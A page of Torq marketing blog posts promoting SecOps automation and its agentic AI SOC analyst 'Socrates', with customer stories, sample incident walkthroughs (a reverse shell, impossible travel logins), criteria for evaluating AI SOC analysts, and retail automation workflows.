AI Hyperautomation Product

SecOps Automation: How Lean Teams Can Achieve Enterprise-Level Security

By Torq

June 10, 2025

8 Minute Read

What Is SecOps Automation?

SecOps automation is the process using technology to streamline and automate the core workflows of security operations, including threat detection, triage, investigation, response, access control, and compliance reporting. It removes the manual work and alert fatigue that bog down security teams, enabling faster, more consistent, and more scalable operations.

While DevSecOps focuses on integrating security into the software development lifecycle, and ITOps automation targets infrastructure and IT service management, SecOps automation is laser-focused on protecting the business from threats.

Traditional SecOps Is Broken

Most security teams today are running on fumes. Threats are increasing, tools are multiplying, and analysts are stuck in an endless loop of triage and tuning as they face:

Too many alerts, not enough analysts: Security teams are drowning in noise. With limited headcount, it’s impossible to investigate everything, causing critical alerts to go unnoticed.
Poor tool integration: 51% of security leaders say their tools don’t integrate well, creating silos, manual handoffs, and slower response times.
Busywork over threat work: 46% of teams spend more time configuring and troubleshooting tools than mitigating threats. Another 59% say maintaining tools is the #1 inefficiency in their SOC.

It’s not sustainable — especially for lean teams.

Why Lean Teams Need SecOps Automation

Lean security teams are under pressure to deliver big results — without the benefit of big budgets, big headcount, or big enterprise infrastructure. They face the same volume of threats, alerts, and compliance requirements as a Fortune 500 but with a fraction of the resources.

SecOps automation bridges this resource gap. Deterministic automation workflows are ideal for the most common, repetitive, or predictable tasks, while non-deterministic workflows — augmented by agentic AI — enable understaffed SOC teams to handle more complex, multi-step security use cases more quickly and move towards an autonomous SOC.

SecOps automation significantly reduces manual overhead, accelerates threat response times, and empowers lean teams to run high-performance SOCs without the traditional overhead.

Five Ways Automated SecOps Helps Level the Playing Field

1. Phishing

Phishing is the most common form of cybercrime, with an estimated 3.4 billion spam emails sent daily. Each suspicious email requires triage, enrichment, investigation, and user outreach. Multiply that by dozens (or hundreds) of alerts a day, and you’re looking at full-blown burnout.

Automated SecOps turns phishing response into a self-contained workflow. From inbox monitoring and URL detonation to IOC lookups and automated takedowns, the entire lifecycle can be handled in minutes — not hours — without ever touching the analyst queue.

2. Threat Intelligence Enrichment

Threat intel is only useful if it’s fast, contextual, and operationalized — three things that don’t happen when analysts are manually switching between threat feeds and enrichment tools.

With SecOps automation, threat enrichment happens automatically. As alerts are ingested, automation pulls relevant context from multiple intel sources, correlates them with local data, and attaches insights to each case. That gives analysts a complete picture from the start.

3. Incident Response

Manual incident response is slow, error-prone, and hard to scale, especially with limited staff. Analysts have to piece together clues from multiple systems, coordinate handoffs, and manually document every action. For lean teams, it’s a recipe for delays and missed steps.

Automated incident response changes the game. As soon as an incident is detected, workflows kick off to contain the threat, collect forensics, notify stakeholders, and even auto-resolve based on pre-approved playbooks. With agentic AI in the loop, you can even triage, investigate, and remediate without any human intervention.

4. Vulnerability Management (VM)

Prioritizing which vulnerabilities matter is half the battle. But manually scanning assets, matching vulnerabilities to context, and assigning follow-up tasks can take days — assuming it gets done at all.

Automated SecOps streamlines the entire VM lifecycle. It ingests scanner output, correlates it with asset data, flags exploitable vulnerabilities, and initiates remediation workflows based on risk level — all without human touch. Analysts get real-time visibility into what’s fixed, what’s pending, and what’s critical.

5. Identity and Access Management (IAM)

Access creep and reused credentials are an open door for attackers — but they’re often overlooked because IAM tasks are tedious and time-consuming.

With automation, IAM becomes hands-free. Just-in-time access, automatic revocation, and periodic audits all run behind the scenes. You can even automate a response to suspicious activity, like impossible travel or privilege escalation, before an attacker has time to act.

SecOps Automation = Big Results for Lean Teams

Built for all skill levels: Low-code and no-code automation platforms have lowered the barrier to entry for security teams, making it easier for them to implement and manage security solutions. Analysts can build and deploy workflows without needing to write a single line of code, while more technical users can dig into scripting and APIs when needed. This flexibility empowers teams to move faster and focus on strategy instead of syntax.

Faster time to value with pre-built workflows: Many SecOps automation platforms offer prebuilt workflows for common use cases like phishing response and alert triage. These templates help teams launch fast, then iterate and customize for their environment.

Unified dashboards and reporting: Effective SecOps automation isn’t just about doing more — it’s about seeing more. Automation platforms often include built-in dashboards, visual workflow builders, and custom reporting tools that make it easier to track performance, prove value, and drive continuous improvement.

More use case coverage: Automation isn’t limited to incident response. Mature SecOps teams extend it to vulnerability management, insider threat detection, access controls, compliance audits, and even IT workflows like onboarding or offboarding. The more you automate, the more time your team has for strategic work.

Fully integrated AI access: It’s no secret that AI is the big hot ticket item in the cybersecurity industry. However, most organizations are diligently evaluating and carefully choosing when and where to deploy AI in their security stack — and rightfully so.

Whether you are slow-rolling AI access due to budget constraints or still building a business case to demonstrate the value of AI in the SOC to upper management, a SecOps automation platform provides a unique, centralized hub that fully integrates with every security solution, ensuring consistent and controlled AI access across your entire security environment.

Torq: The Leading Platform for SecOps Automation

Torq HyperSOC™ is the agentic AI-driven platform explicitly designed to empower lean security teams with extensive SecOps automation capabilities. Torq delivers:

Multi-Agent AI: Torq’s Socrates orchestrates automated workflows across specialized AI agents, seamlessly handling phishing triage, malware containment, IAM hygiene, and more.
Natural language workflows: No-code and low-code interfaces allow teams to launch and modify workflows simply by describing their intent, significantly accelerating adoption and effectiveness.
Rapid integration: Instant, seamless integrations across the entire security ecosystem eliminate silos, ensuring workflows operate fluidly across tools like AWS, Azure, Okta, SentinelOne, and many more.
Autonomous response: From detection to containment and remediation, Torq autonomously manages threats, dramatically reducing response times and enabling analysts to focus on high-impact tasks.

What SecOps Automation Looks Like

Torq customers consistently report transformative impacts from automating SecOps.

Check Point

Check Point’s SOC faced a crushing alert load and a 30–40% manpower gap, until Torq HyperSOC™ came into the picture. Within days, Torq deployed over two dozen AI-driven playbooks that automated repetitive tasks, reduced alert fatigue, and enabled autonomous remediation for low-level threats. Now, analysts are empowered to focus on what matters, with NLP-powered case insights helping them make faster, smarter decisions.

Global Retailer

This global fast-fashion giant replaced its legacy SOAR with Torq Hyperautomation™ to streamline security operations, cut alert fatigue, and simplify complex workflows across international teams. By automating end-user requests, case management, and just-in-time access, they reduced ticket resolution from days to minutes and saved a week of time per request.

Lennar

Lennar’s SOC team replaced XSOAR with Torq to eliminate manual phishing remediation that used to take hours and is now resolved in minutes. With no-code and AI-powered workflow building, analysts of all skill levels can build automations and refocus on proactive threat hunting. Torq’s flexibility and speed also helped streamline asset management, cutting hours of work down to just minutes.

Scale Your Security Without Scaling Your Team

Torq HyperSOC™ enables lean teams to protect their businesses at enterprise scale, with automated SecOps workflows that eliminate manual drudgery, reduce response times, and enable analysts to focus on strategic threat hunting and high-value tasks.

Want to scale your security operations with Torq? Get a demo. And check out our Field CISO’s guide with practical advice for a more efficient SOC.

Get the Guide

The AI SOC Analyst That Offloads 90%+ of Tier-1 Cases — Meet Socrates

By Bob Boyle

June 2, 2025

10 Minute Read

Security Operations Centers (SOCs) continue to struggle in 2025. The perfect storm of growing alert volume, consistent talent shortage, and the well-documented limitations of legacy SOAR solutions have brought many SOC teams to a breaking point. At the same time, bad actors continue to innovate, and cybercriminals have become more sophisticated in their tactics and techniques, including using AI to launch attacks at scale.

Fortunately, AI in the SOC has begun to revolutionize the security operations field, specifically in the area of Tier-1 security analysis. According to Gartner, “By 2026, AI will increase SOC efficiency by 40% compared with 2024 efficiency, beginning a shift in SOC expertise toward AI development, maintenance and protection.”

Why the SOC Needs an AI Analyst

As alert complexity rises, so does burnout and alert fatigue. SOC analysts today spend too much time sifting through noise and manually triaging alerts, rather than taking action to proactively secure the environment. According to the 2024 SANS Detection and Response Survey, more than half of security teams say false positives are a huge problem, and 62.5% are overwhelmed by sheer data volume.

A major reason for this frustration is that security teams are fighting with their own tools. In a recent State of Security 2025 report, Cisco’s Splunk surveyed over 2,000 security professionals in their community to find:

59% spend too much time and/or effort maintaining tools and associated workflows
51% admit their tools do not integrate well with one another
47% face alerting issues
32% of teams do not have the requisite skills to be efficient in the SOC

Tier-1 alert triage is overwhelming. Analysts face tens of thousands of Tier-1 alerts per day, and on average, security analysts are only getting to half of the alerts they’re supposed to review. Combined with these SOC inefficiencies, the volume becomes too high for human-only triage. As a result, detection and response times suffer. Gartner says, “AI agents are emerging as a critical solution to enhance efficiency, reduce burnout, and enable teams to focus on strategic initiatives.”

Enter Torq Socrates — the agentic AI SOC Analyst designed to dramatically offload Tier-1 workloads and lead organizations toward an autonomous SOC.

What is an AI SOC Analyst?

An AI SOC Analyst serves as an extension of SOC teams, automating incident response by interpreting natural language instructions in security runbooks to execute tasks such as alert triage, containment, and remediation actions. While an AI SOC Analyst autonomously handles over 90% of Tier-1 tasks, human analysts remain in control of critical decisions and can interface with the AI SOC Analyst using natural language for additional enrichment, investigation, and recommended next steps.

Learn unconventional criteria for evaluating AI SOC analysts >

What Is Torq Socrates?

Socrates is Torq’s agentic AI SOC Analyst — a self-deterministic, autonomous AI Agent that plans, reasons, and acts the way a human SOC analyst would. Unlike SOAR solutions or common Generative AI chatbots, Socrates does not require human instruction or guidance. Socrates understands the SOC objectives and executes complex actions with minimal oversight.

Legacy SOAR and generic workflow automation solutions offer AI chatbots that run on static, rule-based playbooks — controlled by human input. And, while GenAI augments case triage by generating context to help reduce detection and response times, it is still largely reactive and reliant on human analysts to instruct, guide, and manually trigger remediation actions. Agentic AI, on the other hand, represents the next leap towards a more autonomous SOC.

According to IDC’s latest report, agentic AI has enormous potential in cybersecurity as it can process and solve problems the way a human being would. Socrates isn’t reactive — it’s adaptive. To continuously improve and evolve with new threats, Socrates uses:

Semantic memory to understand prompts and take explicit action
Episodic memory to learn from past incidents to develop new strategies
Procedural memory to make decisions on which tools to use and which data to gather

The Anatomy of Socrates: Torq’s OmniAgent

Socrates is more than just a single AI Agent. Socrates sits at the helm of Torq’s Multi-Agent System (MAS), acting as an OmniAgent in charge of coordinating multiple specialized AI Agents. Each of these agents is trained to perform a specific task, and is capable of using sophisticated iterative planning and reasoning to solve complex, multi-step problems autonomously. Torq’s AI Agents include:

Runbook Agent: Autonomously plans and adapts incident response runbooks with a deep knowledge and understanding of the environment.
Investigation Agent: Performs deep-dive investigations in seconds, uncovering hidden patterns across disparate data sources and tools to pinpoint root causes and assess threat impact.
Remediation Agent: Executes remediation actions, closing the loop with verifiable outcomes, either by autonomously following the associated runbook or through human-in-the-loop response.
Case Management Agent: Gathers real-time and historical data, organizes case timelines, highlights key indicators, and reprioritizes incidents based on evolving information.

This agentic AI architecture is supported by first in class Retrieval-Augemented Generation (RAG) and Model-Context Protocol (MCP) technology that helps the Torq MAS dynamically accelerate SecOps outcomes by improving detection and triage accuracy, while reducing MTTD and MTTR.

How an AI SOC Analyst Performs Tier-1 Tasks

So, how does Socrates leverage Torq’s MAS to perform Tier-1 security tasks? Let’s look at this Command and Control attack detected by Crowdstrike and see how tasks previously handled by human analysts are now handled with unprecedented efficiency by Torq’s AI SOC Analyst, Socrates.

*Watch Socrates, Torq’s AI SOC Analyst, following the guidelines in a SOC runbook to triage a case automatically.*

1. Automatic Runbook Analysis

When a security event arises, an analyst traditionally consults a “runbook” – a guide specifying the response to that specific type of event. Today, these “runbooks” exist in all modern SOCs and are prepared by senior architects to benefit Tier-1 and Tier-2 analysts.

Torq Socrates looks at outcomes of historical cases and associates the appropriate runbook based on the observables of the new case. Socrates automatically analyzes runbooks written in natural language, typically containing step-by-step procedures for handling various security incidents. By analyzing the semantic meaning of the natural language instructions, the AI SOC Analyst derives action flow from the recommended response strategies for different security events.

*The associated case remediation runbook is written in natural language that Socrates analyzes, “understands,” and can follow.*

2. Deep Research Incident Investigations

The many security tools available in the arsenal of Tier-1 SOC analysts can return a large amount of detailed information. The analyst’s goal is to synthesize this information into a decision about which next steps to take, according to the runbook’s guidance.

Just as human analysts rely on insights from the runbook, Socrates can assist in automating investigation or even incident response tasks. This includes executing tasks such as alert triage, data enrichment, containment, and remediation actions, which speeds up response times and reduces the manual effort required from human analysts.

An agentic AI SOC Analyst like Socrates excels at processing both structured and unstructured security tool data. This enables it to analyze complex information and create dynamic decision trees based on runbook analysis. These decision trees adapt to the specific context of each incident, allowing for more efficient and accurate incident handling. For example, Socrates can determine: Is the file malicious? Is the user a very important person (VIP)? Is the activity frequent or infrequent during a specific time period indicating anomalous behavior?

*Socrates utilizing Crowdstrike, VirusTotal, and a deep understanding of the organization’s environment to query observables and distill the relevant information.*

3. Knowledge of Security Frameworks for Context

More experienced alert triage specialists bring their own contextual knowledge and understanding of networking, endpoint architecture, and attack techniques into the mix.

AI Agents are trained on an immense body of natural language documents containing information about the above and more. This allows the semantic analysis of an AI Agent to match the observed outcome of a security tool and the technique described in a documented framework, such as the MITRE ATT&CK framework.

Using the above technique, Torq’s agentic AI SOC Analyst, Socrates, leverages the information available in numerous documents describing attack frameworks, such as the MITRE ATT&CK framework, and maps its tactics and techniques to the outcomes observed in the analyzed security event.

Intelligent modeling with Torq’s AI SOC Analyst Socrates enables it to mimic a human-like thinking process, correlating information efficiently and mapping the appropriate outcomes to common frameworks like the MITRE ATT&CK framework, NIST, and more.

4. Leveraging Hyperautomation to Perform Designated Remediation Actions

The next step for a human analyst is to carry out the remediation actions outlined in the runbooks, choosing the proper tool and executing the instructions.

Based on the content of the runbook, the AI SOC Analyst utilizes its semantic analysis capabilities to suggest and trigger suitable Hyperautomated workflows and security tools from the list of ones explicitly made available within the Torq platform. These workflows align with the specific steps outlined in the document conveyed in natural language.

*Torq Socrates performing the initial actions within the runbook.*

5. Intelligent Case Management and Documentation

An important pillar of any operational practice is the meticulous documentation of all actions taken, decisions, and achieved outcomes.

AI Agents have proven to be efficient at summarizing large amounts of natural language text. Torq Socrates leverages this capability to summarize the “conclusions” and desired next steps, and document them in the “case timeline”. Socrates then reaches back into its toolbox and ability to take action autonomously, marking the case as “closed” and moving the case forward without any human intervention.

*Torq Socrates summarizing the findings and actions taken of the security event and automatically adding them to Torq’s built-in ticket management system timeline.*

How Security Teams Use Socrates Today

Gartner forecasts that by 2028, multi-agent AI in threat detection and incident response will rise from 5% to 70%. For Torq customers leveraging Socrates, this is already their reality.

“I believe the successful use of Torq Agentic AI in SOC operations shows up in practical outcomes. With Torq Agentic AI, the answer is yes to questions such as: Are analysts happier? Are they sticking around? Do they have time to focus on more interesting and complex investigations? Are MTTM and MTTR lower? Torq Agentic AI extends and enhances our team so it can make better decisions more quickly — resulting in stronger security all around.”
Mick Leach, Field CISO, Abnormal Security

Socrates isn’t just another tool — it’s another teammate. And it’s changing the way security gets done. With Socrates, security decisions are made with context, fully automated incident response becomes the default, and agentic AI becomes the connective tissue across previously siloed security solutions that enable SOC teams to move from human-in-the-loop to human-on-the-loop.

According to IDC, Torq HyperSOC, powered by Socrates, helps:

Eliminate over 95% of Tier-1 analyst workload
Reduce time-to-remediation by 90%
Increase case handling capacity 3-5x with zero added headcount

Torq Socrates is designed to handle Tier-1 triage actions by mapping the tasks and activities of human Tier-1 analysts to use cases leveraging agentic AI. With Torq Socrates as their AI SOC Analyst, human security analysts remain in charge of processes and outcomes while introducing dramatic new efficiencies and incident response accuracy, alleviating security analysts’ most critical challenges.

Want to meet Socrates? Request a demo. And get the AI or Die Manifesto to learn strategic considerations and CISO advice for deploying AI in your SOC.

Get the Manifesto

The Multi-Agent System: A New Era for SecOps

By Torq

May 28, 2025

8 Minute Read

Three SOC Threats Solved in Minutes with Torq Hyperautomation

By Bob Boyle

May 22, 2025

5 Minute Read

The SOC Efficiency Challenge

If you’ve spent time in a SOC, these pain points are familiar:

Alert fatigue: Over half of security teams struggle with false positives and data overload.
Endless tickets: Legacy ticket systems and disjointed shift handoffs bog down response times.
Manual swivel-chairing: Analysts lose precious hours jumping between tools and logs.
Manual enrichment: Manually pulling threat intel and context is a major time-sink.

These pain points slow your team’s reaction times and increase risk. But these barriers disappear when Hyperautomation, AI, and smart case management are unified.

Use Case #1: Neutralize a Reverse Shell Command & Control (C2) Attack

When a Ruby-powered reverse shell (courtesy of njRAT) targeted an EC2 Linux instance, Socrates got to work. As Torq HyperSOC’s Omniagent, Socrates detected anomalous process behaviors and network connections, flagging the reverse shell command within seconds.

Without waiting for analyst input, Socrates quarantined the EC2 host. The platform harvested file hashes, process trees, and destination IPs, then enriched them via threat intel feeds and internal CMDB lookups.

Through a deep understanding of the environment and analysis of the remediation runbook associated with the detected use case, Socrates autonomously killed the malicious process in its tracks before the bad actor was able to spread laterally, exfiltrate sensitive data, or cause any further damage.

In under two minutes, the HyperSOC dashboard included an AI-generated incident report with prioritized next steps and detailed documentation of every AI-driven action taken.

Result: The threat was detected and neutralized without manual intervention, allowing analysts to move swiftly to higher-priority tasks.

Use Case #2: Reduce MTTR with Automated MITRE ATT&CK Tagging

Manually identifying and tagging MITRE ATT&CK tactics, techniques and procedures is time-consuming. Socrates streamlined this process by automatically linking and tagging threats with relevant MITRE ATT&CK tactics, techniques, and procedures (TTPs).

The AI Agent parses case data, file hashes, process names, network connections, and behavior patterns, and distills them into discrete observables. Socrates cross-references each observable against the latest MITRE ATT&CK framework — pinpointing not just the primary tactic but also related sub-techniques and procedures.

For each matched TTP, Socrates auto-tags the case, links to relevant playbooks, and correlates with past incidents that used the same methods.

Finally, the AI generates a concise report section that shows:

Tactic: TA0011 – Command and Control
Technique: T1219 – Remote Access Software
Procedure: njRAT reverse shell delivered via Ruby script on EC2 instance.
Confidence: 92%
Potential Impact: Successful execution of these TTPs can lead to unauthorized access and control of critical systems, leading to data breaches or disruptions.
Next Steps: Trigger the containment playbook, notify the Tier-2 SOC analyst team, and run a full asset sweep.

Result: Analysts no longer spend time manually tagging or correlating cases, which helps reduce MTTR and increase consistency across investigations.

Analysts no longer spend time manually tagging or correlating cases, which helps reduce MTTR and increase consistency across investigations. — Socrates auto-tagged MITRE ATT&CK TTPs for a reverse shell incident, cutting MTTR and surfacing next steps in seconds.

Use Case #3: Investigate and Close an Impossible Travel Alert in Minutes

Okta flagged suspicious logins from Austria, Singapore, and Brazil for a single user within a 30-minute window, an impossible travel scenario indicating potential compromise.

Socrates autonomously checked the user’s leave status in Workday and calendar systems. Next, Socrates messaged the employee on Slack, capturing their response directly into the case notes. Simultaneously, it enriched each login IP against external threat intelligence feeds, scoring them for risk and historical malicious activity.

Socrates then compared the session details against the user’s normal behavior baseline to spot anomalies. Finally, because the user had confirmed the unusual travel and all IP reputations returned legitimate, Socrates marked the alert as a benign true positive, documented the reasoning, and closed the case.

Result: This workflow took under three minutes, reducing MTTR and giving analysts hours back by eliminating manual checks and unnecessary escalations.

This workflow took under three minutes, reducing MTTR and giving analysts hours back by eliminating manual checks and unnecessary escalations. — Socrates investigated suspicious Okta logins, cross-checked HR systems, messaged the user, and closed the alert autonomously.

You Wanna See Some Real Speed?

These aren’t theoretical benefits — they’re proof points from the frontlines of modern AI-powered SOCs. When the powers of Hyperautomation, AI, and intelligent case management are combined in Torq HyperSOC, your team doesn’t just move faster; they move smarter.

Instead of being bogged down, analysts are empowered to lead, strategize, and scale across complex environments. That’s how you reduce risk, retain talent, and prove real value.

Want to see HyperSOC in action? Book a demo now — and don’t miss our Field CISO’s guide full of practical advice for building a more efficient SOC.

Get the Guide

CISOs’ Unconventional Criteria for Evaluating AI SOC Analysts

By Noam Cohen

May 19, 2025

10 Minute Read

Noam Cohen is a serial entrepreneur building seriously cool data and AI companies since 2018. Noam’s insights are informed by a unique combination of data, product, and AI expertise — with a background that includes winning the Israel Defense Prize for his work in leveraging data to predict terror attacks. As the Head of Artificial Intelligence at Torq, Noam is helping build truly next-gen AI capabilities into Torq’s autonomous SOC platform.

Still obsessing over compliance certifications and data volumes when choosing your AI SOC analyst? You might as well be that guy at the dealership kicking tires and demanding V8 specs while ignoring the self-driving capabilities.

Today’s CISO battlefield isn’t won with yesterday’s metrics. While AI security vendors sell you on training corpus size and customization options, you should be demanding zero-day detection without signatures and unified threat visibility.

Let’s be brutally honest: the blistering pace of AI innovation means your current AI SOC evaluation checklist is obsolete. GenAI marked an inflection point; now, agentic AI is completely disrupting SecOps. This means the real competitive edge lies in capabilities your procurement team isn’t even asking about.

So, what should CISOs look for in an AI SOC analyst? Below, we break down 8 key capabilities that you might not have considered but are crucial to ensure AI trust and effectiveness in your SOC.

What to Look for in an AI SOC Analyst Evaluation

1. AI That Simplifies and Communicates Context

Look for: Next-gen AI for the SOC that shows sophistication beyond query-response models, demonstrating a nuanced understanding and delightful communication of organizational context, ongoing security incidents, and specific scenarios.

Rather than summarizing in a generic “TL;DR” format, the AI should communicate about logs, case artifacts, and indicators of compromise (IOCs) through a cybersecurity-oriented UI that highlights key information for the specific security context.

Ask:

Can the AI maintain contextual continuity across analyst shifts and SOC handoffs?
How does the chat UI maintain context for the user when referencing information-heavy items like logs and cases?
Does the AI have different user views for summarizing actions, IOCs, and alerts?
Where can I embed our knowledge and policies to guide the AI’s interactions?

General example:

AI SOC Evaluation example: Example: simplified context communication — General example showing how a smart reference summarization popup from Arc (The Browser Company) helps users quickly understand selected text or an entire webpage without leaving their current browser.

2. AI for the Entire Team

Look for: Practical AI capabilities mapped explicitly to real-world SOC workflows and use cases.

The AI SOC analyst should do the actual, gritty tasks your SOC team performs daily — from initial triage to investigating alerts, hunting for threats, and remediating problems. This isn’t about general intelligence; it’s about directly supporting actual analyst workflows from end to end. If you use a multi-agent system (MAS), the AI SOC analyst should act as an OmniAgent to coordinate and collaborate with multiple specialized AI agents to accomplish these complex security goals.

Ask:

What analyst-level jobs does the AI accelerate (e.g. query writing, unstructured enrichment, and response recommendations)?
How does the AI SOC agent accelerate threat hunting and detection engineering through intelligent hypothesis generation?
Is the system capable of auto-healing errors in security workflows the way a good security engineer can?

General example:

Example of AI for cross-functional teams — *General example showing how Gemini’s Gem store features different chatbots for Marketing, Sales, and Developers.*

3. AI That Explains What It’s Doing

Look for: AI that grounds its findings and recommendations in clear, structured explanations showing its sources.

CISOs increasingly prioritize “explainability” in AI decisions as a pragmatic imperative for achieving cognitive alignment between the AI SOC analyst and the human security team. To foster trust, adoption, and effective action, your security team must have a line of sight into the AI’s reasoning, not just its conclusions.

Ask:

Does the AI SOC analyst clearly explain why particular security events are flagged or escalated?
How easily can human analysts validate or challenge the AI’s recommendations? For instance, can they request source links, exact quotes, or highlighting?
Do we have visibility into the AI agent’s self-critique step?
What validation guardrails does the AI implement?

General examples:

Example of AI that explains what it's doing — *General examples showing how two AI models show the data it relies on. Perplexity shows a snippet of the source while NotebookLM highlights the exact sentence it used from the source.*

4. AI That’s Easy to Interact With — Without Training

Look for: A SOC-specific user interface that is genuinely intuitive, innovative, and frictionless and that directly enhances analyst productivity, retention, and job satisfaction.

Even the most powerful AI can be hampered by a clunky or difficult interface, undermining your team’s effectiveness and morale and discouraging AI adoption. A truly innovative interface should feel natural to use and streamline workflows, not add complexity or friction to processes. An intuitive design enables analysts of any level to quickly access insights and take action without specialized skills or knowledge.

Ask:

How much do our human analysts need to be familiar with AI hacks and general prompt engineering, such as knowing when to use deep search options, ask for a specific data format, or open a new conversation thread?
Does the AI SOC analyst support conversational SIEM queries and natural-language threat exploration?
How does the AI communicate its planning and thinking process?
In autopiloting, can I interrupt the investigation before the AI is done?

General example:

AI SOC Evaluation: example of AI that is intuitive to use — *General example showing how Perplexity creates a simpler user experience by auto-choosing the model according to its research, rather than making the user choose a model by task/prompt.*

5. AI That Helps You Get Ahead

Look for: An AI SOC analyst that doesn’t only react to known threats but proactively guides SOC teams towards improving security posture and operational effectiveness.

Think of your top analysts — the ones who are always one step ahead, anticipating your team’s needs and suggesting improvements without being asked. Agentic AI that performs at this advanced level can act as a virtual extension of your team, identifying weaknesses and suggesting optimizations to elevate your security operations.

Ask:

Can the AI SOC analyst proactively detect and suggest SOC operational improvements, such as recommending repetitive manual processes that are ripe for automation?
Can it automatically correlate cases with incident history and recommend improvements?
Has your AI ever caught a missing step in its instructions and fixed it (or asked about it) before executing?
Can the AI automatically tag and store important information from your interactions that can help in future cases?
Will the AI suggest changes to the detection rules, workflows, or playbooks? How often does your AI flag inefficiencies in workflows?

General example:

Example of AI that proactively recommends optimizations — General example of ChatGPT maintaining context after you’ve told it that you are an AI product manager in San Francisco. When asking it to brainstorm messaging for a social post celebrating an achievement, ChatGPT already knows where to start.

6. AI That Understands What You Really Want (and Can Figure Out How to Do It)

Look for: Deterministic, agentic AI that understands how to break a user intent into multiple tasks, which may require different execution plans.

Good AI gets a task and starts working. Great AI first looks for communication gaps, understands the goal, and asks for more instructions when needed. Ideally, the user shouldn’t have to think like the AI to ensure the AI grasps their intent — the AI should understand how the user thinks and ask clarifying questions when needed.

A structured execution scheme reduces ambiguity and improves the accuracy of the AI’s planning and orchestration, eliminating the likelihood of the AI agent skipping steps, going out of order, selecting incorrect tools, or misinterpreting instructions.

Ask:

When I give the AI a vague or complex instruction, does it ask clarifying questions — or just charge ahead?
How does it use screens, user information, and past sessions to better understand the user’s specific intent?
Can your AI break down a high-level goal (‘Investigate this alert’) into a sequence of logically ordered tasks — and tell you why?
Can your AI explain its execution plan in plain language before it starts and adjust if you push back?

General example:

AI SOC Evaluation: Example of AI that asks clarification questions — *General example showing how ChatGPT asks clarification questions before building a report in Deep Research.*

7. An AI Assistant That You Don’t Need to Babysit

Look for: Agentic AI capable of autonomously chaining together multiple actions without constant human prompts.

Your human analysts don’t want to click through 10 steps every time they need the AI to take action. While human oversight of critical decisions is important, to efficiently investigate an alert end-to-end and even initiate containment, an AI SOC analyst must be capable of independently stringing together a sequence of relevant subtasks — like log collection, enrichment, reverse engineering, and containment suggestions — in pursuit of a high-level goal.

Ask:

Can the AI SOC analyst complete a multi-step investigation with one high-level instruction?
Can the AI write and execute deterministic workflows when needed?
Does it pause and check with human analysts before executing sensitive tasks (e.g., blocking users or IPs)?
When given a high-level goal or non-playbook scenario, does the AI independently decide which steps to take and in what order?
How does the AI identify when not to act — and escalate to a human when it hits a confidence or authority threshold?

General example:

AI SOC Evaluation: Example of AI that defines when it needs to loop humans in — *General example of how Intercom’s Fin interface defines the moments where a human needs to be looped into the convo.*

8. AI That Gets More Helpful Through Human Feedback

Look for: An AI SOC analyst that continuously learns and improves by observing and incorporating feedback from human analyst behavior.

The best AI SOC analysts learn from human analyst behavior to become more effective and accurate over time. Think of it as shaping the ideal analyst that shadows your team, watches how they triage alerts, write queries, and handle false positives — and gets smarter with every interaction.

Human analysts should be able to fine-tune and correct AI as threats evolve rather than treating it as a black box. In practice, features like thumbs-up/down ratings, interactive retraining, or the ability to override AI decisions make the human–AI loop tighter and more effective.

Ask:

How does the AI SOC analyst adapt based on human analysts’ corrections or preferences over time?
Can I adjust the AI’s prioritization or response style via feedback?
How can the user flag a successful conversation with the AI to make future sessions easier and more effective?
Can you review and audit what the AI has learned from your team?

General example:

AI SOC Evaluation: Example of AI that continuously improves — *General example showing how Cursor’s Coding Rules feature helps developers continuously improve and adapt their preferences using natural language.*

Next-Gen AI for the SOC is Here — Are You Ready?

Don’t be the security leader who marvels at a shiny paint job while ignoring the revolutionary engine. When evaluating AI SOC analysts, focus on explainable intelligence, seamless integration into your team’s workflow, and deterministic AI that can independently plan and orchestrate all of the actions required to complete a high-level goal from end to end.

Finding an AI SOC analyst that truly understands context, empowers your analysts, and acts with proactive autonomy will ensure you’re not just keeping up with the latest tech but investing in a force multiplier for your security team.

Get the AI or Die Manifesto to learn strategic considerations, get insights from a CISO, and learn red flags and more questions to ask for an AI SOC evaluation.

Get the Manifesto

The Future of Retail Cybersecurity: SOC Automation

By Bob Boyle

May 12, 2025

6 Minute Read

Retail companies are high-value targets for cybercriminals. With sprawling infrastructures, complex supply chains, and large amounts of customer data, retailers are a goldmine for bad actors. In 2024, the retail sector accounted for 24% of all cyberattacks — more than any other industry. The average cost of a data breach in retail rose to $3.28 million.

Meanwhile, security teams in the retail sector face increasing pressure to maintain uptime, protect consumer data, and streamline operations across global environments. This is where security Hyperautomation comes in.

Below, we explore key retail cybersecurity use cases for security Hyperautomation and spotlight how a fashion retail giant used Torq to cut ticket response times and scale SOC operations across global markets.

Why Retail Cybersecurity Teams Need SOC Automation

Retail has become one of the most targeted industries, accounting for one in four cyberattacks. Phishing, ransomware, and credential theft are the leading threats driven by attackers looking to exploit high volumes of customer data and payment information.

The rise of e-commerce (84% of consumers now shop online) and global retail operations has dramatically expanded the attack surface. Add distributed teams and ever-tightening compliance demands — and it’s no wonder retail cybersecurity processes are struggling to keep up.

Top retail SOC challenges include:

High alert volumes with limited analyst headcount
Manual ticket handling and case management
Access and identity control challenges
Customer service expectations and compliance demands

SOC automation is the engine behind this transformation, powered by Torq Hyperautomation™. By leveraging specialized AI Agents, Torq Hyperautomation helps retailers meet these security challenges: eliminating repetitive work, accelerating incident response, and gaining visibility across global environments — all without needing to rip and replace their security stack.

Top Retail Cybersecurity Challenges Solved by Hyperautomation

Below are the top use cases being Hyperautomated by Torq’s retail cybersecurity customer base, along with real-world examples of the workflows they have built.

1. Security Case Management

Automate the ingestion and processing of security incidents from Wiz. For “open” incidents, facilitate the creation and management of security cases with enriched data and actionable insights.

Workflow Steps:

Filter Wiz event data to select incidents with status ‘OPEN’ and severity ‘MEDIUM’, ‘HIGH’, or ‘CRITICAL’.
Transform data using Data Agent (AI-generated data transformation) operator to prepare it for case creation.
Create a new case with detailed incident information and links.
Add a quick action button to the case for advancing investigation phases based on the assigned runbook.
Extract indicators of compromise (IOCs) from incident alerts.
Populate observables within the security case with the newly extracted IOCs.
Update case severity based on incident severity and;
1. IF case severity changes to ‘CRITICAL’ or ‘HIGH’, change the case state to ‘TRIAGE’ and assign the case to the appropriate Tier-2 analyst.
2. IF case severity changes to ‘MEDIUM’ or ‘LOW’, change the case state to ‘TRIAGE’ and assign the case to Socrates, Torq’s AI SOC Analyst, for remediation.

2. Threat Intelligence Analysis

Automate the process of retrieving, analyzing, and managing threat intelligence data from CrowdStrike alerts, integrating AI Task Agent operator analysis, and updating case observables.

Workflow Steps:

List Crowdstrike case events and filter them based on [custom] criteria.
Create a session with CrowdStrike, retrieve alert details, and add to case.
Filter and process command line data using the AI Task Agent for analysis.
Extract and filter IOCs from alert details.
